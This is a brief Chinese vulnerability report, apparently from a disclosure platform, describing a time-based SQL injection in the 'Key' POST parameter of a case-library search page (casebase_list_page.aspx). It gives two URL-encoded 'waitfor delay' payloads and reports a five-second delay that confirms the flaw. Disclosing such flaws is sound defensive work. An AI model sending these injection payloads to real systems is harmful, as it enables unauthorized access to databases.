漏洞发生在:/webpages/casebase_list_page.aspx
在关键词查找的地方
post参数Key存在sql注入:
测试如下:

当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A0%27--" 时不存在延时

当key="test%27%29%3Bwaitfor+delay+%270%3A0%3A5%27--"
明显延时5秒
存在延时注入.
暂无评论